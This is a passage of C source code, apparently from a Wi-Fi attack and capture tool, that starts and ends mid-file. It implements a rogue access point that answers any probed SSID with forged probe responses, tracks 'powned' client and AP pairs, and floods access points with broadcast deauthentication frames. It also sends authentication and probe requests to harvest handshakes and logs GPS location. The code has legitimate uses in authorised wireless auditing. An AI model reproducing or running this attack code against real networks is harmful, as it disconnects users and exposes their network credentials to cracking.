const uint8_t proberesponsedata[] = { 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x0c, 0x12, 0x18, 0x24, 0x03, 0x01, 0x05, 0x2a, 0x01, 0x00, 0x32, 0x04, 0x30, 0x48, 0x60, 0x6c, 0x2d, 0x1a, 0xef, 0x11, 0x1b, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x04, 0x06, 0xe6, 0x47, 0x0d, 0x00, 0x3d, 0x16, 0x05, 0x0d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7f, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0xdd, 0x18, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x01, 0x00, 0x00, 0x03, 0xa4, 0x00, 0x00, 0x27, 0xa4, 0x00, 0x00, 0x42, 0x43, 0x5e, 0x00, 0x62, 0x32, 0x2f, 0x00, 0xdd,
0x09, 0x00, 0x03, 0x7f, 0x01, 0x01, 0x00, 0x00, 0xff, 0x7f, 0xdd, 0x0c, 0x00, 0x04, 0x0e, 0x01, 0x01, 0x02, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x14, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x02, 0x00, 0x00, 0xdd, 0x6f, 0x00, 0x50, 0xf2, 0x04, 0x10, 0x4a, 0x00, 0x01, 0x10, 0x10, 0x44, 0x00, 0x01, 0x02, 0x10, 0x3b, 0x00, 0x01, 0x03, 0x10, 0x47, 0x00, 0x10, 0xd5, 0x6c, 0x63, 0x68, 0xb0, 0x16, 0xf7, 0xc3, 0x09, 0x22, 0x34, 0x81, 0xc4, 0xe7, 0x99, 0x1b, 0x10, 0x21, 0x00, 0x03, 0x41, 0x56, 0x4d, 0x10, 0x23, 0x00, 0x04, 0x46, 0x42, 0x6f, 0x78, 0x10, 0x24, 0x00, 0x04, 0x30, 0x30, 0x30, 0x30, 0x10, 0x42, 0x00, 0x04, 0x30, 0x30, 0x30, 0x30, 0x10, 0x54, 0x00, 0x08, 0x00, 0x06, 0x00, 0x50, 0xf2, 0x04, 0x00, 0x01, 0x10, 0x11, 0x00, 0x04, 0x46, 0x42, 0x6f, 0x78, 0x10, 0x08, 0x00, 0x02, 0x23, 0x88, 0x10, 0x3c, 0x00, 0x01, 0x01, 0x10, 0x49, 0x00, 0x06, 0x00, 0x37, 0x2a, 0x00, 0x01, 0x20 }; #define PROBERESPONSE_SIZE sizeof(proberesponsedata) static uint8_t packetout[1024]; if((filtermode == 1) && (checkfilterlistentry(macsta) == true)) { return; } if((filtermode == 2) && (checkfilterlistentry(macsta) == false)) { return; } if(checkpownedstaap(macsta, macap) >= 3) { return; } memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +ESSID_LEN_MAX +IETAG_SIZE +1); memcpy(&packetout, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetout +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_PROBE_RESP; memcpy(macftx->addr1, macsta, 6); memcpy(macftx->addr2, macap, 6); memcpy(macftx->addr3, macap, 6); macftx->sequence = myproberesponsesequence++ << 4; if(myproberesponsesequence >= 4096) { myproberesponsesequence = 0; } capap = (capap_t*)(packetout +HDRRT_SIZE +MAC_SIZE_NORM); capap->timestamp = mytime; capap->beaconintervall = 0x640; capap->capabilities = 0x431; packetout[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE] = 0; packetout[HDRRT_SIZE +MAC_SIZE_NORM 
+CAPABILITIESAP_SIZE +1] = essid_len; memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE], essid, essid_len); memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +essid_len], &proberesponsedata, PROBERESPONSE_SIZE); packetout[HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +essid_len +0x0c] = channelscanlist[cpa]; if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_NORM +CAPABILITIESAP_SIZE +IETAG_SIZE +essid_len +PROBERESPONSE_SIZE) < 0) { perror("\nfailed to transmit proberesponse"); errorcount++; outgoingcount--; } fsync(fd_socket); outgoingcount++; return; } /*===========================================================================*/ static inline void process80211probe_req() { static uint8_t *essidtagptr; static ietag_t *essidtag; static myaplist_t *zeiger; if(payload_len < (int)IETAG_SIZE) { return; } essidtagptr = gettag(TAG_SSID, payload_ptr, payload_len); if(essidtagptr == NULL) { return; } essidtag = (ietag_t*)essidtagptr; if((essidtag->len == 0) || (essidtag->len > ESSID_LEN_MAX) || (essidtag->data[0] == 0)) { return; } for(zeiger = myaplist; zeiger < myaplist +MYAPLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) { myaplist_ptr = zeiger; break; } if((zeiger->essid_len == essidtag->len) && (memcmp(zeiger->essid, essidtag->data, essidtag->len) == 0)) { zeiger->timestamp = timestamp; send_proberesponse(macfrx->addr2, zeiger->addr, zeiger->essid_len, zeiger->essid); return; } } if((myaplist_ptr -myaplist) >= MYAPLIST_MAX) { qsort(myaplist, MYAPLIST_MAX, MYAPLIST_SIZE, sort_myaplist_by_time); myaplist_ptr = myaplist; } memset(myaplist_ptr, 0, MYAPLIST_SIZE); myaplist_ptr->timestamp = timestamp; mynicap++; myaplist_ptr->addr[5] = mynicap & 0xff; myaplist_ptr->addr[4] = (mynicap >> 8) & 0xff; myaplist_ptr->addr[3] = (mynicap >> 16) & 0xff; myaplist_ptr->addr[2] = myouiap & 0xff; myaplist_ptr->addr[1] = (myouiap >> 8) & 0xff; myaplist_ptr->addr[0] = (myouiap >> 16) & 0xff; myaplist_ptr->essid_len = 
essidtag->len; memcpy(myaplist_ptr->essid, essidtag->data, essidtag->len); send_proberesponse(macfrx->addr2, myaplist_ptr->addr, myaplist_ptr->essid_len, myaplist_ptr->essid); if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_PROBES) == STATUS_PROBES) { printtimenet(macfrx->addr1, macfrx->addr2); printessid(myaplist_ptr->essid_len, myaplist_ptr->essid); fprintf(stdout, " [PROBEREQUEST, SEQUENCE %d]\n", macfrx->sequence >> 4); } aplist_ptr++; return; } /*===========================================================================*/ static inline void process80211directed_probe_req() { static uint8_t *essidtagptr; static ietag_t *essidtag; static myaplist_t *zeiger; if(payload_len < (int)IETAG_SIZE) { return; } essidtagptr = gettag(TAG_SSID, payload_ptr, payload_len); if(essidtagptr == NULL) { return; } essidtag = (ietag_t*)essidtagptr; if((essidtag->len == 0) || (essidtag->len > ESSID_LEN_MAX) || (essidtag->data[0] == 0)) { return; } for(zeiger = myaplist; zeiger < myaplist +MYAPLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) { myaplist_ptr = zeiger; break; } if((memcmp(zeiger->addr, macfrx->addr1, 6) == 0) && (zeiger->essid_len == essidtag->len) && (memcmp(zeiger->essid, essidtag->data, essidtag->len) == 0)) { zeiger->timestamp = timestamp; send_proberesponse(macfrx->addr2, zeiger->addr, zeiger->essid_len, zeiger->essid); return; } } if((myaplist_ptr -myaplist) >= MYAPLIST_MAX) { qsort(myaplist, MYAPLIST_MAX, MYAPLIST_SIZE, sort_myaplist_by_time); myaplist_ptr = myaplist; } memset(myaplist_ptr, 0, MYAPLIST_SIZE); myaplist_ptr->timestamp = timestamp; memcpy(myaplist_ptr->addr, macfrx->addr1, 6); myaplist_ptr->essid_len = essidtag->len; memcpy(myaplist_ptr->essid, essidtag->data, essidtag->len); send_proberesponse(macfrx->addr2, myaplist_ptr->addr, myaplist_ptr->essid_len, myaplist_ptr->essid); if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_PROBES) == STATUS_PROBES) { printtimenet(macfrx->addr1, macfrx->addr2); 
printessid(aplist_ptr->essid_len, aplist_ptr->essid); fprintf(stdout, " [PROBEREQUEST, SEQUENCE %d]\n", macfrx->sequence >> 4); } aplist_ptr++; return; } /*===========================================================================*/ static inline void process80211rcascanproberesponse() { static aplist_t *zeiger; static uint8_t *apinfoptr; static int apinfolen; static uint8_t *essidtagptr; static ietag_t *essidtag = NULL; static uint8_t *channeltagptr; static ietag_t *channeltag = NULL; static uint8_t *rsntagptr; static ietag_t *rsntag = NULL; if(payload_len < (int)CAPABILITIESAP_SIZE) { return; } apinfoptr = payload_ptr +CAPABILITIESAP_SIZE; apinfolen = payload_len -CAPABILITIESAP_SIZE; if(apinfolen < (int)IETAG_SIZE) { return; } for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) { aplist_ptr = zeiger; break; } if(memcmp(zeiger->addr, macfrx->addr2, 6) == 0) { zeiger->timestamp = timestamp; if((zeiger->essid_len == 0) || (zeiger->essid[0] == 0)) { essidtagptr = gettag(TAG_SSID, apinfoptr, apinfolen); if(essidtagptr != NULL) { essidtag = (ietag_t*)essidtagptr; if(essidtag->len <= ESSID_LEN_MAX) { zeiger->essid_len = essidtag->len; memcpy(zeiger->essid, essidtag->data, essidtag->len); } } } if(memcmp(&mac_mysta, macfrx->addr1, 6) == 0) { zeiger->status = 1; return; } if(((zeiger->count %apattacksintervall) == 0) && (zeiger->count < (apattacksmax *apattacksintervall))) { if(attackapflag == false) { send_directed_proberequest(macfrx->addr2, zeiger->essid_len, zeiger->essid); zeiger->status = 0; } } zeiger->count++; return; } } if((aplist_ptr -aplist) >= APLIST_MAX) { qsort(aplist, APLIST_MAX, APLIST_SIZE, sort_aplist_by_time); aplist_ptr = aplist; } memset(aplist_ptr, 0, APLIST_SIZE); aplist_ptr->timestamp = timestamp; if(memcmp(&mac_mysta, macfrx->addr1, 6) == 0) { aplist_ptr->status = 1; } memcpy(aplist_ptr->addr, macfrx->addr2, 6); aplist_ptr->channel = channelscanlist[cpa]; channeltagptr = gettag(TAG_CHAN, apinfoptr, 
apinfolen); if(channeltagptr != NULL) { channeltag = (ietag_t*)channeltagptr; aplist_ptr->channel = channeltag->data[0]; } essidtagptr = gettag(TAG_SSID, apinfoptr, apinfolen); if(essidtagptr != NULL) { essidtag = (ietag_t*)essidtagptr; if(essidtag->len <= ESSID_LEN_MAX) { aplist_ptr->essid_len = essidtag->len; memcpy(aplist_ptr->essid, essidtag->data, essidtag->len); } } rsntagptr = gettag(TAG_RSN, apinfoptr, apinfolen); if(rsntagptr != NULL) { rsntag = (ietag_t*)rsntagptr; if((rsntag->len >= 20) && (rsntag->len <= RSN_LEN_MAX)) { aplist_ptr->rsn_len = rsntag->len; memcpy(aplist_ptr->rsn, rsntag->data, rsntag->len); } } if(attackapflag == false) { if(memcmp(&mac_mysta, macfrx->addr1, 6) != 0) { send_directed_proberequest(macfrx->addr2, essidtag->len, essidtag->data); } aplist_ptr->count++; } if(fd_pcapng != 0) { writeepb(fd_pcapng); } aplist_ptr++; aplistcount++; if(aplistcount > APLIST_MAX) { aplistcount = APLIST_MAX; } return; } /*===========================================================================*/ static inline void process80211rcascanbeacon() { static aplist_t *zeiger; static uint8_t *apinfoptr; static int apinfolen; static uint8_t *essidtagptr; static ietag_t *essidtag = NULL; static uint8_t *channeltagptr; static ietag_t *channeltag = NULL; static uint8_t *rsntagptr; static ietag_t *rsntag = NULL; if(payload_len < (int)CAPABILITIESAP_SIZE) { return; } apinfoptr = payload_ptr +CAPABILITIESAP_SIZE; apinfolen = payload_len -CAPABILITIESAP_SIZE; if(apinfolen < (int)IETAG_SIZE) { return; } for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) { aplist_ptr = zeiger; break; } if(memcmp(zeiger->addr, macfrx->addr2, 6) == 0) { if(memcmp(&mac_mysta, macfrx->addr1, 6) == 0) { zeiger->status = 1; } if(((zeiger->count %apattacksintervall) == 0) && (zeiger->count < (apattacksmax *apattacksintervall))) { if(attackapflag == false) { zeiger->status = 0; send_directed_proberequest(macfrx->addr2, zeiger->essid_len, zeiger->essid); } 
} zeiger->count++; return; } } if((aplist_ptr -aplist) >= APLIST_MAX) { qsort(aplist, APLIST_MAX, APLIST_SIZE, sort_aplist_by_time); aplist_ptr = aplist; } memset(aplist_ptr, 0, APLIST_SIZE); aplist_ptr->timestamp = timestamp; if(memcmp(&mac_mysta, macfrx->addr1, 6) == 0) { aplist_ptr->status = 1; } memcpy(aplist_ptr->addr, macfrx->addr2, 6); aplist_ptr->channel = channelscanlist[cpa]; channeltagptr = gettag(TAG_CHAN, apinfoptr, apinfolen); if(channeltagptr != NULL) { channeltag = (ietag_t*)channeltagptr; aplist_ptr->channel = channeltag->data[0]; } essidtagptr = gettag(TAG_SSID, apinfoptr, apinfolen); if(essidtagptr != NULL) { essidtag = (ietag_t*)essidtagptr; if(essidtag->len <= ESSID_LEN_MAX) { aplist_ptr->essid_len = essidtag->len; memcpy(aplist_ptr->essid, essidtag->data, essidtag->len); } } rsntagptr = gettag(TAG_RSN, apinfoptr, apinfolen); if(rsntagptr != NULL) { rsntag = (ietag_t*)rsntagptr; if((rsntag->len >= 20) && (rsntag->len <= RSN_LEN_MAX)) { aplist_ptr->rsn_len = rsntag->len; memcpy(aplist_ptr->rsn, rsntag->data, rsntag->len); } } if(attackapflag == false) { send_directed_proberequest(macfrx->addr2, essidtag->len, essidtag->data); } if(fd_pcapng != 0) { writeepb(fd_pcapng); } aplist_ptr++; aplistcount++; if(aplistcount > APLIST_MAX) { aplistcount = APLIST_MAX; } return; } /*===========================================================================*/ static inline void process80211beacon() { static aplist_t *zeiger; static uint8_t *apinfoptr; static int apinfolen; static uint8_t *essidtagptr; static ietag_t *essidtag = NULL; static uint8_t *channeltagptr; static ietag_t *channeltag = NULL; static uint8_t *rsntagptr; static ietag_t *rsntag = NULL; if(payload_len < (int)CAPABILITIESAP_SIZE) { return; } apinfoptr = payload_ptr +CAPABILITIESAP_SIZE; apinfolen = payload_len -CAPABILITIESAP_SIZE; if(apinfolen < (int)IETAG_SIZE) { return; } for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) { aplist_ptr = zeiger; break; 
} if(memcmp(zeiger->addr, macfrx->addr2, 6) == 0) { zeiger->timestamp = timestamp; if(((zeiger->count %deauthenticationintervall) == 0) && (zeiger->count < (deauthenticationsmax *deauthenticationintervall))) { if(deauthenticationflag == false) { send_broadcast_deauthentication(macfrx->addr2, WLAN_REASON_UNSPECIFIED); } } if(((zeiger->count %apattacksintervall) == 0) && (zeiger->count < (apattacksmax *apattacksintervall))) { if(attackapflag == false) { if((zeiger->rsn_len != 0) && (zeiger->essid_len != 0) && (zeiger->essid[0] != 0)) { send_authenticationrequestopensystem(macfrx->addr2); } else { send_directed_proberequest(macfrx->addr2, essidtag->len, essidtag->data); } } } zeiger->count++; return; } } if((aplist_ptr -aplist) >= APLIST_MAX) { qsort(aplist, APLIST_MAX, APLIST_SIZE, sort_aplist_by_time); aplist_ptr = aplist; } if(deauthenticationflag == false) { send_broadcast_deauthentication(macfrx->addr2, WLAN_REASON_UNSPECIFIED); send_broadcast_deauthentication(macfrx->addr2 ,WLAN_REASON_UNSPECIFIED); aplist_ptr->count = 2; } memset(aplist_ptr, 0, APLIST_SIZE); aplist_ptr->timestamp = timestamp; if(memcmp(&mac_mysta, macfrx->addr1, 6) == 0) { aplist_ptr->status = 1; } memcpy(aplist_ptr->addr, macfrx->addr2, 6); aplist_ptr->channel = channelscanlist[cpa]; channeltagptr = gettag(TAG_CHAN, apinfoptr, apinfolen); if(channeltagptr != NULL) { channeltag = (ietag_t*)channeltagptr; aplist_ptr->channel = channeltag->data[0]; } essidtagptr = gettag(TAG_SSID, apinfoptr, apinfolen); if(essidtagptr != NULL) { essidtag = (ietag_t*)essidtagptr; if(essidtag->len <= ESSID_LEN_MAX) { aplist_ptr->essid_len = essidtag->len; memcpy(aplist_ptr->essid, essidtag->data, essidtag->len); } } rsntagptr = gettag(TAG_RSN, apinfoptr, apinfolen); if(rsntagptr != NULL) { rsntag = (ietag_t*)rsntagptr; if((rsntag->len >= 20) && (rsntag->len <= RSN_LEN_MAX)) { aplist_ptr->rsn_len = rsntag->len; memcpy(aplist_ptr->rsn, rsntag->data, rsntag->len); } } else { aplist_ptr->status = 0; } 
aplist_ptr->essid_len = essidtag->len; memset(aplist_ptr->essid, 0, ESSID_LEN_MAX); memcpy(aplist_ptr->essid, essidtag->data, essidtag->len); if(attackapflag == false) { if((aplist_ptr->rsn_len != 0) && (aplist_ptr->essid_len != 0) && (aplist_ptr->essid[0] != 0)) { send_authenticationrequestopensystem(macfrx->addr2); } else { send_directed_proberequest(macfrx->addr2, essidtag->len, essidtag->data); } } if(fd_pcapng != 0) { writeepb(fd_pcapng); } if((statusout & STATUS_BEACON) == STATUS_BEACON) { printtimenet(macfrx->addr1, macfrx->addr2); printessid(aplist_ptr->essid_len, aplist_ptr->essid); fprintf(stdout, " [BEACON, SEQUENCE %d, AP CHANNEL %d]\n", macfrx->sequence >> 4,aplist_ptr->channel); } aplist_ptr++; return; } /*===========================================================================*/ static inline void programmende(int signum) { if((signum == SIGINT) || (signum == SIGTERM) || (signum == SIGKILL)) { wantstopflag = true; } return; } /*===========================================================================*/ static bool set_channel() { static int res; static struct iwreq pwrq; res = 0; memset(&pwrq, 0, sizeof(pwrq)); strncpy(pwrq.ifr_name, interfacename, IFNAMSIZ -1); pwrq.u.freq.e = 0; pwrq.u.freq.flags = IW_FREQ_FIXED; pwrq.u.freq.m = channelscanlist[cpa]; res = ioctl(fd_socket, SIOCSIWFREQ, &pwrq); if(res < 0) { return false; } return true; } /*===========================================================================*/ static void remove_channel_from_scanlist(uint8_t c) { while(channelscanlist[c +1] != 0) { channelscanlist[c] = channelscanlist[c +1]; c++; } channelscanlist[c] = channelscanlist[c +1]; return; } /*===========================================================================*/ static void test_channels() { static uint8_t c; static int res; static struct iwreq pwrq; static int frequency; static int testchannel; usleep(10000); memset(&pwrq, 0, sizeof(pwrq)); strncpy(pwrq.ifr_name, interfacename, IFNAMSIZ -1); pwrq.u.freq.e = 0; 
pwrq.u.freq.flags = IW_FREQ_FIXED; pwrq.u.freq.m = 2; res = ioctl(fd_socket, SIOCSIWFREQ, &pwrq); c = 0; while(channelscanlist[c] != 0) { testchannel = 0; frequency = 0; usleep(10000); memset(&pwrq, 0, sizeof(pwrq)); strncpy(pwrq.ifr_name, interfacename, IFNAMSIZ -1); pwrq.u.freq.e = 0; pwrq.u.freq.flags = IW_FREQ_FIXED; pwrq.u.freq.m = channelscanlist[c]; res = ioctl(fd_socket, SIOCSIWFREQ, &pwrq); if(res < 0) { printf("warning: failed to set channel %d (%s) - removed this channel from scan list\n", channelscanlist[c], strerror(errno)); remove_channel_from_scanlist(c); continue; } usleep(10000); memset(&pwrq, 0, sizeof(pwrq)); strncpy(pwrq.ifr_name, interfacename, IFNAMSIZ -1); pwrq.u.freq.e = 0; pwrq.u.freq.flags = IW_FREQ_FIXED; res = ioctl(fd_socket, SIOCGIWFREQ, &pwrq); if(res < 0) { printf("warning: failed to set channel %d (%s) - removed this channel from scan list\n", channelscanlist[c], strerror(errno)); remove_channel_from_scanlist(c); continue; } frequency = pwrq.u.freq.m; if(frequency > 100000) { frequency /= 100000; } if(frequency < 1000) { testchannel = frequency; } else if((frequency >= 2407) && (frequency <= 2474)) { testchannel = (frequency -2407)/5; } else if((frequency >= 2481) && (frequency <= 2487)) { testchannel = (frequency -2412)/5; } else if((frequency >= 5150) && (frequency <= 5875)) { testchannel = (frequency -5000)/5; } if(testchannel != channelscanlist[c]) { if(testchannel == frequency) { printf("warning: failed to set channel %d - removed this channel from scan list\n", channelscanlist[c]); } else { printf("warning: failed to set channel %d (%dMHz) - removed this channel from scan list\n", channelscanlist[c], frequency); } remove_channel_from_scanlist(c); continue; } c++; } return; } /*===========================================================================*/ static void show_channels() { static int c; static int res; static struct iwreq pwrq; static int frequency; static int testchannel; fprintf(stdout, "available channels:\n"); 
for(c = 0; c < 256; c++) { testchannel = 0; frequency = 0; memset(&pwrq, 0, sizeof(pwrq)); strncpy(pwrq.ifr_name, interfacename, IFNAMSIZ -1); pwrq.u.freq.e = 0; pwrq.u.freq.flags = IW_FREQ_FIXED; pwrq.u.freq.m = c; res = ioctl(fd_socket, SIOCSIWFREQ, &pwrq); if(res >= 0) { memset(&pwrq, 0, sizeof(pwrq)); strncpy(pwrq.ifr_name, interfacename, IFNAMSIZ -1); pwrq.u.freq.e = 0; pwrq.u.freq.flags = IW_FREQ_FIXED; res = ioctl(fd_socket, SIOCGIWFREQ, &pwrq); if(res >= 0) { frequency = pwrq.u.freq.m; if(frequency > 100000) { frequency /= 100000; } if(frequency < 1000) { testchannel = frequency; } else if((frequency >= 2407) && (frequency <= 2474)) { testchannel = (frequency -2407)/5; } else if((frequency >= 2481) && (frequency <= 2487)) { testchannel = (frequency -2412)/5; } else if((frequency >= 5150) && (frequency <= 5875)) { testchannel = (frequency -5000)/5; } if(testchannel > 0) { memset(&pwrq, 0, sizeof(pwrq)); strncpy( pwrq.ifr_name, interfacename, IFNAMSIZ -1); pwrq.u.txpower.value = -1; pwrq.u.txpower.fixed = 1; pwrq.u.txpower.disabled = 0; pwrq.u.txpower.flags = IW_TXPOW_DBM; if(ioctl(fd_socket, SIOCGIWTXPOW, &pwrq) < 0) { if(testchannel == frequency) { fprintf(stdout, " %3d\n", testchannel); } else { fprintf(stdout, " %3d / %4dMHz\n", testchannel, frequency); } } else { if(pwrq.u.txpower.value > 0) { if(testchannel == frequency) { fprintf(stdout, "%3d (%2d dBm)\n",testchannel, pwrq.u.txpower.value); } else { fprintf(stdout, "%3d / %4dMHz (%2d dBm)\n",testchannel, frequency, pwrq.u.txpower.value); } } } } } } } return; } /*===========================================================================*/ static inline bool activate_gpsd() { static int c; static struct sockaddr_in gpsd_addr; static int fdnum; static fd_set readfds; static struct timeval tvfd; char *gpsdptr; char *gpsd_lat = "\"lat\":"; char *gpsd_lon = "\"lon\":"; char *gpsd_alt = "\"alt\":"; char *gpsd_enable_json = "?WATCH={\"json\":true}"; char *gpsd_disable = "?WATCH={\"enable\":false}"; char 
*gpsd_version = "\"proto_major\":3"; char *gpsd_json = "\"json\":true"; char *gpsd_tpv = "\"class\":\"TPV\""; printf("connecting to GPSD...\n"); gpsd_len = 0; memset(&gpsddata, 0, GPSDDATA_MAX +1); memset(&gpsd_addr, 0, sizeof(struct sockaddr_in)); gpsd_addr.sin_family = AF_INET; gpsd_addr.sin_port = htons(2947); gpsd_addr.sin_addr.s_addr = inet_addr("127.0.0.1"); if(connect(fd_socket_gpsd, (struct sockaddr*) &gpsd_addr, sizeof(gpsd_addr)) < 0) { perror("failed to connect to GPSD"); return false; } tvfd.tv_sec = 1; tvfd.tv_usec = 0; FD_ZERO(&readfds); FD_SET(fd_socket_gpsd, &readfds); fdnum = select(fd_socket_gpsd +1, &readfds, NULL, NULL, &tvfd); if(fdnum <= 0) { fprintf(stderr, "failed to select GPS socket\n"); return false; } if(FD_ISSET(fd_socket_gpsd, &readfds)) { gpsd_len = read(fd_socket_gpsd, gpsddata, GPSDDATA_MAX); if(gpsd_len <= 0) { fprintf(stderr ,"failed to get GPSD identification\n"); gpsd_len = 0; return false; } gpsddata[gpsd_len] = 0; if(strstr(gpsddata, gpsd_version) == NULL) { printf("unsupported GPSD version (not 3)\n"); gpsd_len = 0; return false; } } if(write(fd_socket_gpsd, gpsd_enable_json, 20) != 20) { perror("failed to activate GPSD WATCH"); gpsd_len = 0; return false; } tvfd.tv_sec = 1; tvfd.tv_usec = 0; FD_ZERO(&readfds); FD_SET(fd_socket_gpsd, &readfds); fdnum = select(fd_socket_gpsd +1, &readfds, NULL, NULL, &tvfd); if(fdnum <= 0) { fprintf(stderr, "GPSD timeout\n"); if(write(fd_socket_gpsd, gpsd_disable, 23) != 23) { perror("failed to terminate GPSD WATCH"); } gpsd_len = 0; return false; } if(FD_ISSET(fd_socket_gpsd, &readfds)) { gpsd_len = read(fd_socket_gpsd, gpsddata, GPSDDATA_MAX); if(gpsd_len <= 0) { fprintf(stderr, "failed to get GPSD protocol\n"); if(write(fd_socket_gpsd, gpsd_disable, 23) != 23) { perror("failed to terminate GPSD WATCH"); } gpsd_len = 0; return false; } gpsddata[gpsd_len] = 0; if(strstr(gpsddata, gpsd_json) == NULL) { printf("unsupported GPSD protocol (not json)\n"); if(write(fd_socket_gpsd, gpsd_disable, 23) 
!= 23) { perror("failed to terminate GPSD WATCH"); } gpsd_len = 0; return false; } } printf("waiting up to 5 seconds to retrieve first position\n"); c = 0; while(c < 5) { tvfd.tv_sec = 5; tvfd.tv_usec = 0; FD_ZERO(&readfds); FD_SET(fd_socket_gpsd, &readfds); fdnum = select(fd_socket_gpsd +1, &readfds, NULL, NULL, &tvfd); if(fdnum <= 0) { fprintf(stderr, "failed to read initial GPSD position\n"); if(write(fd_socket_gpsd, gpsd_disable, 23) != 23) { perror("failed to terminate GPSD WATCH"); } gpsd_len = 0; return false; } if(FD_ISSET(fd_socket_gpsd, &readfds)) { gpsd_len = read(fd_socket_gpsd, gpsddata, GPSDDATA_MAX); if(gpsd_len <= 0) { perror("failed to get GPSD protocol"); if(write(fd_socket_gpsd, gpsd_disable, 23) != 23) { perror("failed to terminate GPSD WATCH"); } gpsd_len = 0; return false; } gpsddata[gpsd_len] = 0; if(strstr(gpsddata, gpsd_tpv) != NULL) { break; } } c++; } if(c < 5) { if((gpsdptr = strstr(gpsddata, gpsd_lat)) != NULL) { sscanf(gpsdptr +6, "%Lf", &lat); } if((gpsdptr = strstr(gpsddata, gpsd_lon)) != NULL) { sscanf(gpsdptr +6, "%Lf", &lon); } if((gpsdptr = strstr(gpsddata, gpsd_alt)) != NULL) { sscanf(gpsdptr +6, "%Lf", &alt); } if((lat == 0) && (lon == 0)) { if(write(fd_socket_gpsd, gpsd_disable, 23) != 23) { perror("failed to terminate GPSD WATCH"); gpsd_len = 0; return false; } } printf("GPSD activated\n"); return true; } fprintf(stderr, "failed to get GPSD position\n"); if(write(fd_socket_gpsd, gpsd_disable, 23) != 23) { perror("failed to terminate GPSD WATCH"); } gpsd_len = 0; return false; } /*===========================================================================*/ static inline void processpackets() { static int c; static int sa; static unsigned long long int statuscount; static unsigned long long int oldincommingcount1; static unsigned long long int oldincommingcount5; static char *gpsdptr; static char *gpsd_time = "\"time\":"; static char *gpsd_lat = "\"lat\":"; static char *gpsd_lon = "\"lon\":"; static char *gpsd_alt = 
"\"alt\":"; static rth_t *rth; static int fdnum; static fd_set readfds; static struct timeval tvfd; static uint8_t lastaddr1proberequest[6]; static uint8_t lastaddr2proberequest[6]; static uint16_t lastsequenceproberequest; static uint8_t lastaddr1proberesponse[6]; static uint8_t lastaddr2proberesponse[6]; static uint16_t lastsequenceproberesponse; static uint8_t lastaddr1authentication[6]; static uint8_t lastaddr2authentication[6]; static uint16_t lastsequenceauthentication; static uint8_t lastaddr1associationrequest[6]; static uint8_t lastaddr2associationrequest[6]; static uint16_t lastsequenceassociationrequest; static uint8_t lastaddr1associationresponse[6]; static uint8_t lastaddr2associationresponse[6]; static uint16_t lastsequenceassociationresponse; static uint8_t lastaddr1reassociationrequest[6]; static uint8_t lastaddr2reassociationrequest[6]; static uint16_t lastsequencereassociationrequest; static uint8_t lastaddr1reassociationresponse[6]; static uint8_t lastaddr2reassociationresponse[6]; static uint16_t lastsequencereassociationresponse; static uint8_t lastaddr1data[6]; static uint8_t lastaddr2data[6]; static uint16_t lastsequencedata; memset(&lastaddr1proberequest, 0, 6); memset(&lastaddr2proberequest, 0, 6); lastsequenceproberequest = 0; memset(&lastaddr1proberesponse, 0, 6); memset(&lastaddr2proberesponse, 0, 6); lastsequenceproberesponse = 0; memset(&lastaddr1authentication, 0, 6); memset(&lastaddr2authentication, 0, 6); lastsequenceauthentication = 0; memset(&lastaddr1associationrequest, 0, 6); memset(&lastaddr2associationrequest, 0, 6); lastsequenceassociationrequest = 0; memset(&lastaddr1associationresponse, 0, 6); memset(&lastaddr2associationresponse, 0, 6); lastsequenceassociationresponse = 0; memset(&lastaddr1reassociationrequest, 0, 6); memset(&lastaddr2reassociationrequest, 0, 6); lastsequencereassociationrequest = 0; memset(&lastaddr1reassociationresponse, 0, 6); memset(&lastaddr2reassociationresponse, 0, 6); 
